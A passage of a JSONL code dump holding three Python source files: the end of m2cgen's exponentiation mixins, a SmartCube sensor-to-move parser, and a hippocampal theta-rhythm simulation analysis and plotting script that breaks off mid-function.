self._do_interpret(subroutine.expr)\n self._cg.add_return_statement(last_result)\n\n return self._cg.finalize_and_get_generated_code()\n\n def _get_subroutine_name(self):\n subroutine_name = f\"subroutine{self._subroutine_idx}\"\n self._subroutine_idx += 1\n return subroutine_name\n\n # Methods to be implemented by subclasses.\n\n def create_code_generator(self):\n raise NotImplementedError\n\n\nclass PowExprInfixMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin is used for languages that provide the exponentiation operation in a form\n of an infix operator. Such languages inlcude Haskell, F#, R and others.\n\n The operator used by default is \"**\", but it can be overriden by setting an appropriate\n value in `pow_operator`.\n \"\"\"\n\n pow_operator = \"**\"\n\n infix_expressions = (*BaseToCodeInterpreter.infix_expressions, ast.PowExpr)\n\n def interpret_pow_expr(\n self,\n expr,\n is_left_from_parent=None,\n parent_precedence=None,\n is_parent_associative=None,\n **kwargs\n ):\n base_result = self._do_interpret(\n expr.base_expr,\n is_left_from_parent=True,\n parent_precedence=expr.precedence,\n **kwargs\n )\n exp_result = self._do_interpret(\n expr.exp_expr,\n is_left_from_parent=False,\n parent_precedence=expr.precedence,\n is_parent_associative=expr.is_associative,\n **kwargs\n )\n return self._cg.infix_expression(\n left=base_result,\n right=exp_result,\n op=self.pow_operator,\n wrap=self._wrap_infix_expr(\n expr,\n is_left_from_parent=is_left_from_parent,\n parent_precedence=parent_precedence,\n is_parent_associative=is_parent_associative\n )\n )\n\n\nclass PowExprFunctionMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin is used for languages that provide the exponentiation operation as a function.\n Such languages inlcude C, Java, Python and others.\n\n The name of the function must be set in `power_function_name` by implementing subclasses.\n \"\"\"\n\n power_function_name = NotImplemented\n\n def interpret_pow_expr(self, expr, **kwargs):\n if self.power_function_name is NotImplemented:\n raise NotImplementedError(\"Power function is not provided\")\n self.with_math_module = True\n base_result = self._do_interpret(expr.base_expr, **kwargs)\n exp_result = self._do_interpret(expr.exp_expr, **kwargs)\n return self._cg.function_invocation(self.power_function_name, base_result, exp_result)\n","repo_name":"BayesWitnesses/m2cgen","sub_path":"m2cgen/interpreters/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":2652,"dataset":"github-code","pt":"72"} +{"seq_id":"22748293571","text":"from collections import deque\n\nclass PinTracker:\n def __init__(self, turn, turn_inv, max_val=1023, bounce_threshold=100):\n self.turn = turn\n self.turn_inv = turn_inv\n self.previous_values = deque([0 for _ in range(10)])\n self.previous_indices = deque([0 for _ in range(10)])\n self.last_state = 0\n self.max_val = max_val\n self.bounce_threshold = bounce_threshold\n self.states = [0.25 * i * self.max_val for i in [1, 2, 3, 4]]\n\n def update(self, value):\n self.previous_values.appendleft(value)\n self.previous_values.pop()\n\n max_diff = max(self.previous_values) - min(self.previous_values)\n if max_diff > self.bounce_threshold:\n value = self.max_val\n\n current_index = 0\n while value > self.states[current_index]:\n current_index += 1\n\n self.previous_indices.appendleft(current_index)\n self.previous_indices.pop()\n\n result = None\n\n if len(set(self.previous_indices)) == 1:\n d = (current_index - self.last_state) % 4\n if d != 0:\n result = {1: self.turn, 2: None, 3: self.turn_inv}[d]\n self.last_state = current_index\n\n return result\n\n#trackers = [PinTracker(s) for s in \"udlrfb\"]\ntrackers = [\n PinTracker(\"F'\", \"F\" ), # f'\n PinTracker(\"D\", \"D'\"),\n PinTracker(\"L'\", \"L\" ),\n PinTracker(\"U'\", \"U\" ), # u'\n PinTracker(\"B'\", \"B\" ), # b'\n PinTracker(\"R'\", \"R\" ), # r'\n]\n\nwhile True:\n s = input()\n if \"0x000e\" not in s:\n continue\n bytevals = s.split(\"0x000e value: \")[1].split()\n vals = [int(bytevals[(2*i)+1] + bytevals[2*i], 16) for i in range(6)]\n # print(vals)\n for i in range(6):\n turn = trackers[i].update(vals[i])\n if turn:\n print(turn)\n\n","repo_name":"thamma/SmartCube","sub_path":"parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74951471593","text":"# -*- coding: utf-8 -*-\n\"\"\"\nmain script for processing\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport processingLib as plib\nimport os\nimport scipy.signal as sig\nfrom scipy.stats import circmean, circstd\n\nplt.rc('axes', linewidth=2)\nplt.rc('xtick', labelsize=18)\nplt.rc('ytick', labelsize=18)\nplt.rc('lines', linewidth=3) \nplt.rc('lines', markersize=4)\nplt.rc('lines', c=\"black\")\n\ndef get_colors():\n neurons_colors = {\n \"pyr\" : (1.0, 0.2, 0.2), \n \"bas\" : (0.4, 1.0, 1.0),\n \"olm\" : (0.6, 1.0, 0.4),\n \"ca3\" : (1.0, 0.8, 0.0),\n \"ec\" : (1.0, 0.6, 0.6),\n \"ms\" : (0.2, 0.6, 1.0),\n }\n return neurons_colors\n\ndef make_calculation(path, file):\n Np = 400 # 400 # number of pyramide neurons\n Nb = 50 # number of basket cells\n Nolm = 50 # 50 # number of olm cells\n \n Nec = 100\n Nca3 = 100\n NSG = 100\n \n file = path + file\n \n fd = 10000\n margin = 0.5 # margin from start for analisis in seconds\n \n res = np.load(file)\n \n\n margin_ind = int(margin * fd)\n V = res[()][\"results\"][\"V\"]\n\n firing = res[()][\"results\"][\"firing\"]\n firing[0, :] -= 1000 * margin\n firing = firing[:, firing[0, :] >= 0]\n \n lfp = 0\n for v in V:\n try:\n lfp += v[\"dendrite\"] - v[\"soma\"]\n except KeyError:\n continue\n \n \n lfp = lfp[margin_ind : ] / Np\n lfp_filtred = plib.filtrate_lfp(lfp, 10000)\n lfp_filtred = lfp_filtred[0:-1:20]\n fd_filtered = 500\n \n lfp_filtred_fft = 2 * np.abs( np.fft.rfft(lfp) ) / lfp.size\n freqs = np.fft.rfftfreq(lfp.size, 1/fd)\n \n theta_part = np.sum(lfp_filtred_fft[ (freqs >= 4)&(freqs <= 12) ]) / np.sum(lfp_filtred_fft[1:]) \n \n theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 10, fd_filtered, 3)\n \n firing_slices = {}\n\n firing[0, :] *= 0.001\n # plot septal neurons\n cum_it = Np \n sl = (firing[1, :] < cum_it)\n \n \n firing_slices[\"pyramide\"] = np.copy(sl)\n\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n firing_slices[\"basket\"] = np.copy(sl)\n\n cum_it += Nb\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n cum_it += Nolm\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NSG)\n \n firing_slices[\"gaba_pv\"] = np.copy(sl)\n\n cum_it += NSG \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nec) \n firing_slices[\"ec\"] = np.copy(sl)\n cum_it += Nec\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nca3) \n\n firing_slices[\"cs\"] = np.copy(sl)\n \n neurons_phases = plib.get_units_disrtibution(theta_lfp, fd_filtered, firing, firing_slices)\n neurons_phases[\"theta_part\"] = theta_part\n \n return neurons_phases\n \n\ndef make_figures(path, file, septumInModel): # path, file, septumInModel=True\n\n Np = 400 # 400 # number of pyramide neurons\n Nb = 50 # number of basket cells\n Nolm = 50 # 50 # number of olm cells\n \n if (septumInModel):\n Nglu = 40\n NgabaCR = 40\n NgabaPV1 = 40 \n NgabaPV2 = 40\n NgabaPacPV1 = 10\n NgabaPacPV2 = 10\n else:\n NSG = 100 # number of spike generators of\n \n Nec = 100\n Nca3 = 100\n\n neurons_colors = get_colors()\n\n \n saving_path = path + file[0:2]\n \n file = path + file\n \n fd = 10000\n margin = 0.5 # margin from start for analisis in seconds\n \n res = np.load(file)\n \n lfp = res[()][\"results\"][\"lfp\"]\n margin_ind = int(margin * fd)\n lfp = lfp[margin_ind : ]\n V = res[()][\"results\"][\"V\"]\n currents = res[()][\"results\"][\"currents\"]\n firing = res[()][\"results\"][\"firing\"]\n firing[0, :] -= 1000 * margin\n firing = firing[:, firing[0, :] >= 0]\n \n \n \n lfp_filtred = plib.filtrate_lfp(lfp, fd)\n lfp_filtred = lfp_filtred[0:-1:20]\n fd = 500\n t = np.linspace(0, lfp_filtred.size/fd, lfp_filtred.size)\n\n \n lfp2 = 0\n Vdm = -60\n Vsm = -60\n for v in V:\n try:\n Vdm += v[\"dendrite\"]\n Vsm += v[\"soma\"]\n lfp2 += v[\"dendrite\"] - v[\"soma\"]\n except KeyError:\n continue\n # lfp *= 1000 # recalculate from mV to mkV \n # lfp2 *= 1000 # recalculate from mV to mkV \n Vdm = Vdm[margin_ind : ] / Np\n Vsm = Vsm[margin_ind : ] / Np\n \n lfp2 = lfp2[margin_ind : ] / Np\n lfp_filtred2 = plib.filtrate_lfp(lfp2, 10000)\n lfp_filtred2 = lfp_filtred2[0:-1:20]\n \n pyr_firing_max_idx = 0\n tmp_count = 0\n for idx in range(Np):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n pyr_firing_max_idx = idx - 1\n \n\n bas_firing_max_idx = Np + 1\n tmp_count = 0\n for idx in range(Np, Np + Nb):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n bas_firing_max_idx = idx - 1\n \n olm_firing_max_idx = Np + Nb + 1\n tmp_count = 0\n for idx in range( Np + Nb, Np + Nb + Nolm):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n olm_firing_max_idx = idx - 1\n \n \n Vpyr = V[pyr_firing_max_idx][\"soma\"][margin_ind : ] - 60\n # Vpyrd = V[pyr_firing_max_idx][\"dendrite\"][margin_ind : ] - 60\n Vbas = V[bas_firing_max_idx][\"soma\"][margin_ind : ]\n Volm = V[olm_firing_max_idx][\"soma\"][margin_ind : ]\n \n \n t4v = np.linspace(0, t[-1], Vpyr.size)\n \n \n \n plt.figure( figsize = (10, 5), tight_layout=True)\n plt.subplot(311)\n plt.plot(t4v, Vpyr, color=neurons_colors[\"pyr\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n\n \n plt.subplot(312)\n plt.plot(t4v, Vbas, color=neurons_colors[\"bas\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n\n \n plt.subplot(313)\n plt.plot(t4v, Volm, color=neurons_colors[\"olm\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n \n \n plt.savefig(saving_path + \"Vhist.png\", dpi = 500)\n \n \n \n plt.figure( figsize = (10, 2), tight_layout=True )\n #plt.subplot(211)\n plt.plot(t, lfp_filtred2, color=\"black\")\n plt.xlim(0, 1.5)\n # plt.subplot(212)\n # plt.plot(t, lfp_filtred, \"g\")\n plt.savefig(saving_path + \"lfp2.png\", dpi = 500)\n \n lfp = lfp2 # !!!!!!!!!!\n lfp_filtred = lfp_filtred2 # !!!!!!!!!!!!!!!!\n \n # calculate and plot wavelet spectrum and LFP signal\n freqs, coefs = plib.computemycwt(fd, lfp_filtred)\n \n \n plt.figure( figsize = (10, 5), tight_layout=True )\n plt.subplot(211)\n Z = np.abs(coefs) * 1000\n plt.pcolor(t, freqs, Z, cmap='rainbow', vmin=Z.min(), vmax= Z.max())\n plt.title('Wavelet spectrum of simulated LFP')\n # set the limits of the plot to the limits of the data\n plt.axis([t[0], t[-1], freqs[0], 30])\n plt.colorbar()\n \n \n plt.subplot(212)\n plt.plot(t, 1000 * lfp_filtred, color=\"black\")\n plt.xlim(t[0], t[-1])\n # plt.ylim(1.2*lfp_filtred.max(), -1.2*lfp_filtred.min())\n plt.colorbar()\n plt.savefig(saving_path + \"wavelet.png\", dpi = 500)\n \n \n lfp_filtred_fft = 2 * np.abs( np.fft.rfft(lfp2) ) / lfp2.size\n freqs = np.fft.rfftfreq(lfp2.size, 1/10000)\n \n theta_part = np.sum(lfp_filtred_fft[ (freqs >= 4)&(freqs <= 12) ]) / np.sum(lfp_filtred_fft[1:]) \n \n \n plt.figure( tight_layout=True )\n plt.plot(freqs[1:], lfp_filtred_fft[1:])\n plt.xlim(0, 20)\n plt.ylim(0, 0.1)\n plt.savefig(saving_path + \"fft_lfp_filteterd.png\", dpi = 500)\n \n \n \n \n # calculate and plot asymmetry index\n asymmetry_index, idx_max, idx_min = plib.get_asymetry_index(lfp_filtred)\n if (asymmetry_index.size > 0):\n plt.figure()\n plt.subplot(121)\n plt.plot(t, lfp_filtred, color=\"black\", linewidth=2)\n lfp_max = lfp_filtred.max()\n lfp_min = lfp_filtred.min()\n for i in idx_max:\n plt.plot([t[i], t[i]], [lfp_min, lfp_max], color=\"blue\", linestyle=\"dashed\", linewidth=2)\n \n for i in idx_min:\n plt.plot([t[i], t[i]], [lfp_min, lfp_max], color=\"blue\", linestyle=\"dashed\", linewidth=2)\n \n plt.subplot(122) \n plt.hist(asymmetry_index, 10, normed=1, facecolor='blue', alpha=0.75)\n plt.xlim(-1.5, 1.5)\n plt.xlabel('Asymmetry index')\n plt.ylabel('Theta cycles')\n plt.title('')\n plt.savefig(saving_path + \"asymmetry_index.png\", dpi = 500)\n else:\n print (\"Zero elements in asymemetry index array\")\n \n # calculate and plot amplitude - phase cross frequency coupling between theta and gamma rhythms\n ampFrs = np.linspace(30, 80, 50)\n phFrs = np.array([4.0, 10.0])\n apcoupling = plib.cossfrequency_phase_amp_coupling(lfp_filtred, fd, ampFrs, phFrs, 0.1)\n theta_phase = np.linspace(-np.pi, np.pi, apcoupling.shape[1])\n plt.figure()\n plt.subplot(111)\n plt.pcolor(theta_phase, ampFrs, apcoupling, cmap='rainbow', vmin=apcoupling.min(), vmax=apcoupling.max())\n plt.title('Cross frequency coupling between theta and gamma rhythms')\n plt.axis([-np.pi, np.pi, ampFrs[0], ampFrs[-1]])\n plt.colorbar()\n plt.savefig(saving_path + \"amp_phase_coupling.png\", dpi = 500)\n \n # calculate and plot phase-phase cross frequency coupling between theta and gamma rhythms\n phFrs1 = np.array([4.0, 10.0])\n phFrs2 = np.array([30, 90])\n nmarray = np.ones([2, 12])\n nmarray[1, :] = np.arange(1, 13)\n ppcoupling = plib.cossfrequency_phase_phase_coupling (lfp_filtred, fd, phFrs1, phFrs2, nmarray)\n \n plt.figure()\n plt.plot(nmarray[1, :], ppcoupling)\n plt.xlim(1, nmarray[1, -1])\n plt.savefig(saving_path + \"phase_phase_coupling.png\", dpi = 500)\n# \n \n # calculate and plot phase coupling between units activity and theta rhythm \n \n \n theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 10, fd, 3)\n \n plt.figure( figsize = (10, 2), tight_layout=True )\n plt.plot(t, theta_lfp, color=\"black\")\n plt.xlim(t[0], t[-1])\n plt.savefig(saving_path + \"theta_lfp.png\", dpi = 500)\n \n \n \n \n \n \n plt.figure()\n plt.plot(t, lfp_filtred, color=\"black\")\n plt.xlim(0, 1.5) # plt.xlim(t[0], t[-1])\n \n \n # plt.subplot(312)\n # plt.plot(t, theta_lfp, color=\"blue\")\n # plt.xlim(0, 1.5) #plt.xlim(t[0], t[-1])\n firing_slices = {}\n # plt.figure( figsize = (10, 5), tight_layout=True )\n fig, (a1, a2, a3, a4, a5, a6) = plt.subplots(6, 1, sharex=True, gridspec_kw = {'height_ratios':[2, 2, 2, 1, 1, 8]}, figsize = (10, 5))\n fig.set_size_inches(10, 10)\n \n \n \n firing[0, :] *= 0.001\n # plot septal neurons\n if (septumInModel):\n pass\n# cum_it = Nglu\n# sl = firing[1, :] <= cum_it\n# firing_slices[\"glu\"] = np.copy(sl)\n# glu_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"r\")\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaCR)\n# firing_slices[\"gaba_cr\"] = np.copy(sl)\n# cr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"g\")\n# cum_it += NgabaCR\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV1 + NgabaPacPV1)\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# pv1_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV1 + NgabaPacPV1\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV2 + NgabaPacPV2)\n# firing_slices[\"gaba_pv2\"] = np.copy(sl)\n# pv2_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV2 + NgabaPacPV2\n#\n# # plot hippocampal neurons\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Np)\n else:\n cum_it = Np \n sl = (firing[1, :] < cum_it)\n \n \n firing_slices[\"pyramide\"] = np.copy(sl)\n pyr_line = a6.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"pyr\"])\n \n if (septumInModel):\n cum_it += Np\n \n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n firing_slices[\"basket\"] = np.copy(sl)\n basket_line = a5.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"bas\"])\n a5.set_ylim(400, 450)\n cum_it += Nb\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n olm_line = a4.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"olm\"])\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n if not(septumInModel):\n cum_it += Nolm\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NSG)\n \n pv_line = a3.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ms\"])\n firing_slices[\"gaba_pv\"] = np.copy(sl)\n \n# if (septumInModel): \n# plt.legend((glu_line, cr_line, pv1_line, pv2_line, pyr_line, basket_line, olm_line),\n# ('Glu', 'GABA(CR)', 'GABA(PV1)', 'GABA(PV2)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=12)\n# else:\n# plt.legend((pv_line, pyr_line, basket_line, olm_line),\n# ('GABA(PV)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=12)\n \n cum_it += NSG \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nec) \n a2.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ec\"])\n firing_slices[\"ec\"] = np.copy(sl)\n cum_it += Nec\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nca3) \n a1.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ca3\"])\n firing_slices[\"cs\"] = np.copy(sl)\n \n plt.xlim(0, 1.5) #(0, t[-1])\n # plt.ylim(0, 800)\n \n fig.tight_layout()\n fig.savefig(saving_path + \"raster.png\", dpi = 500)\n \n \n \n \n neurons_phases_for_return = plib.get_units_disrtibution(theta_lfp, fd, firing, firing_slices)\n \n neurons_phases = {}\n for neuron_phase_key in neurons_phases_for_return.keys():\n neurons_phases[neuron_phase_key] = np.append(neurons_phases_for_return[neuron_phase_key], neurons_phases_for_return[neuron_phase_key] + 2*np.pi )\n \n phases_x = np.linspace(-np.pi, 3*np.pi, 40)\n phases_y = 0.5*np.cos(phases_x) + 0.5\n plt.figure( tight_layout=True )\n plt.subplot(311)\n\n plt.hist(neurons_phases[\"pyramide\"], 40, normed=True, facecolor=neurons_colors[\"pyr\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.subplot(312)\n plt.hist(neurons_phases[\"basket\"], 40, normed=True, facecolor=neurons_colors[\"bas\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.subplot(313)\n plt.hist(neurons_phases[\"olm\"], 40, normed=True, facecolor=neurons_colors[\"olm\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.tight_layout()\n plt.savefig(saving_path + \"phase_disribution_histogram.png\", dpi = 500)\n \n plt.figure()\n plt.subplot(111, polar=True)\n\n \n color = \"y\"\n for key, sl in firing_slices.items():\n fir = firing[:, sl]\n if (fir.size == 0):\n continue\n \n \n angles, length = plib.get_units_phase_coupling(theta_lfp, fir, fd)\n #angles += np.pi/2\n \n if (key == \"glu\"):\n color = \"r\"\n if (key == \"gaba_cr\"):\n color = \"g\"\n if (key == \"gaba_pv1\" or key == \"gaba_pv2\" or key == \"gaba_pv\"):\n color = neurons_colors[\"ms\"]\n if (key == \"pyramide\"):\n color = neurons_colors[\"pyr\"]\n if (key == \"basket\"):\n color = neurons_colors[\"bas\"] \n if (key == \"olm\"):\n color = neurons_colors[\"olm\"]\n if (key == \"cs\"):\n color = neurons_colors[\"ca3\"]\n if (key == \"ec\"):\n color = neurons_colors[\"ec\"]\n \n plt.scatter(angles, length, color=color)\n \n # calculate histogram ?\n \n\n plt.savefig(saving_path + \"phase_disribution_of_neurons.png\", dpi = 500)\n plt.figure( tight_layout=True )\n plt.subplot(111)\n #theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 12, fd, 2)\n \n color = \"g\"\n for key, sl in firing_slices.items():\n \n fir = firing[:, sl]\n if (fir.size == 0):\n continue\n angles, length = plib.get_units_phase_coupling(theta_lfp, fir, fd)\n #angles += np.pi/2\n minn = np.min( firing[1, sl] ) \n maxn = np.max( firing[1, sl] ) \n numbers = np.linspace(minn, maxn, angles.size)\n \n if (key == \"glu\"):\n color = \"r\"\n if (key == \"gaba_cr\"):\n color = \"g\"\n if (key == \"gaba_pv1\" or key == \"gaba_pv2\" or key == \"gaba_pv\"):\n color = neurons_colors[\"ms\"]\n if (key == \"pyramide\"):\n color = neurons_colors[\"pyr\"]\n if (key == \"basket\"):\n color = neurons_colors[\"bas\"] \n if (key == \"olm\"):\n color = neurons_colors[\"olm\"]\n if (key == \"cs\"):\n color = neurons_colors[\"ca3\"]\n if (key == \"ec\"):\n color = neurons_colors[\"ec\"]\n plt.scatter(angles, numbers, color=color)\n\n # calculate histogram ?\n plt.ylim(0, 800)\n tmp_phases = np.linspace(-np.pi, np.pi, 1000)\n plt.plot( tmp_phases, 200 * ( np.cos(tmp_phases) + 1 ), color=\"black\" )\n plt.xlim(-np.pi, np.pi)\n \n plt.savefig(saving_path + \"phase_disribution_of_neurons2.png\", dpi = 500)\n \n \n\n \n \n soma_currents = np.zeros(currents[0][\"soma\"].size)\n dendrite_current = np.zeros_like(soma_currents)\n Vin = np.zeros(V[0][\"soma\"].size)\n for cur, vin in zip(currents, V):\n if \"dendrite\" in cur.keys():\n soma_currents += cur[\"soma\"]\n dendrite_current += cur[\"dendrite\"]\n Vin += vin[\"soma\"]\n \n soma_currents = sig.resample(soma_currents[margin_ind: ], lfp_filtred.size) \n dendrite_current = sig.resample(dendrite_current[margin_ind : ], lfp_filtred.size) \n Vin /= Np\n Vin = sig.resample(Vin[margin_ind: ], lfp_filtred.size) \n \n \n soma_currents = (soma_currents - soma_currents.mean() ) / soma_currents.std()\n dendrite_current = (dendrite_current - dendrite_current.mean() ) / dendrite_current.std()\n lfp_filtred_normed = (lfp_filtred - lfp_filtred.mean()) / lfp_filtred.std()\n plt.figure( tight_layout=True, figsize=(8, 5) )\n plt.subplot(311)\n plt.plot(t, Vin)\n plt.title(\"Intracellular potential on soma\")\n plt.xlim(0, 1.5) #plt.xlim(1, 1.5)\n plt.subplot(312)\n plt.plot(t, soma_currents, \"b\")\n plt.plot(t, lfp_filtred_normed, \"g\")\n #plt.ylim(-1, 1)\n plt.xlim(0, 1.5) # plt.xlim(1, 1.5) #\n plt.title(\"soma\")\n plt.subplot(313)\n plt.plot(t, dendrite_current, \"b\")\n plt.plot(t, lfp_filtred_normed, \"g\")\n plt.xlim(0, 1.5) # plt.xlim(1, 1.5) #\n # plt.ylim(-1, 1)\n plt.title(\"dendrite\")\n# plt.subplot(414) \n# # plot septal neurons\n# if (septumInModel):\n# cum_it = Nglu\n# sl = firing[1, :] <= cum_it\n# firing_slices[\"glu\"] = np.copy(sl)\n# glu_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"r\")\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaCR)\n# firing_slices[\"gaba_cr\"] = np.copy(sl)\n# cr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"g\")\n# cum_it += NgabaCR\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV1 + NgabaPacPV1)\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# pv1_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV1 + NgabaPacPV1\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV2 + NgabaPacPV2)\n# firing_slices[\"gaba_pv2\"] = np.copy(sl)\n# pv2_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV2 + NgabaPacPV2\n#\n# # plot hippocampal neurons\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Np)\n# else:\n# cum_it = Np \n# sl = (firing[1, :] < cum_it)\n# firing_slices[\"pyramide\"] = np.copy(sl)\n# pyr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"c\")\n# \n# if (septumInModel):\n# cum_it += Np\n# \n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n# firing_slices[\"basket\"] = np.copy(sl)\n# basket_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"k\")\n# cum_it += Nb\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n# firing_slices[\"olm\"] = np.copy(sl)\n# olm_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"m\")\n# plt.ylim(0, 800)\n# #plt.xlim(1, 1.5) #plt.xlim(0, 1.5)\n# if not(septumInModel):\n# cum_it += Nolm\n# sl = (firing[1, :] > cum_it)\n# \n# pv_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# \n# if (septumInModel): \n# plt.legend((glu_line, cr_line, pv1_line, pv2_line, pyr_line, basket_line, olm_line),\n# ('Glu', 'GABA(CR)', 'GABA(PV1)', 'GABA(PV2)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=8)\n# else:\n# plt.legend((pv_line, pyr_line, basket_line, olm_line),\n# ('GABA(PV)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=8)\n \n\n plt.savefig(saving_path + \"currents.png\", dpi = 500)\n plt.close('all')\n \n neurons_phases_for_return[\"theta_part\"] = theta_part\n return neurons_phases_for_return\n \n################################################################\ndef ms_cs_pp_phase_shift_processing(processed_data, saving_path):\n \n \n \n \n phase_shift = np.linspace(-np.pi, np.pi, 30)\n \n neurons_colors = get_colors()\n \n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n \n new_processed_data = []\n \n for idx1 in range(30):\n \n \n pyr_data = np.array([], dtype=float)\n bas_data = np.array([], dtype=float)\n olm_data = np.array([], dtype=float)\n theta_part = np.array([], dtype=float)\n \n \n for t in processed_data[idx1:-1:30]:\n # print (t)\n pyr_data = np.append(pyr_data, t[\"pyramide\"])\n bas_data = np.append(bas_data, t[\"basket\"])\n olm_data = np.append(olm_data, t[\"olm\"])\n theta_part = np.append(theta_part, t[\"theta_part\"])\n \n tmp_dict = {\"pyramide\":pyr_data, \"basket\":bas_data, \"olm\":olm_data, \"theta_part\":theta_part}\n \n new_processed_data.append(tmp_dict)\n\n theta_part = []\n for data_value in new_processed_data:\n data_mean_pyr.append( circmean(data_value[\"pyramide\"], high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(data_value[\"pyramide\"], high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(data_value[\"basket\"], high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(data_value[\"basket\"], high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(data_value[\"olm\"], high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(data_value[\"olm\"], high=np.pi, low=-np.pi) )\n \n theta_part.append(data_value[\"theta_part\"])\n \n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharex=True)\n axs[0].plot(phases, wave, color=\"black\", linewidth=2)\n axs[0].errorbar(data_mean_pyr, phase_shift, xerr=data_varience_pyr, fmt='o', color=neurons_colors[\"pyr\"] )\n \n axs[0].set_xlim(-2*np.pi, 2*np.pi)\n axs[0].set_title('Pyr')\n axs[1].plot(phases, wave, color=\"black\", linewidth=2)\n axs[1].errorbar(data_mean_bas, phase_shift, xerr=data_varience_bas, fmt='o', color=neurons_colors[\"bas\"])\n \n axs[1].set_xlim(-2*np.pi, 2*np.pi)\n axs[1].set_title('Bas')\n \n axs[2].plot(phases, wave, color=\"black\", linewidth=2)\n axs[2].errorbar(data_mean_olm, phase_shift, xerr=data_varience_olm, fmt='o', 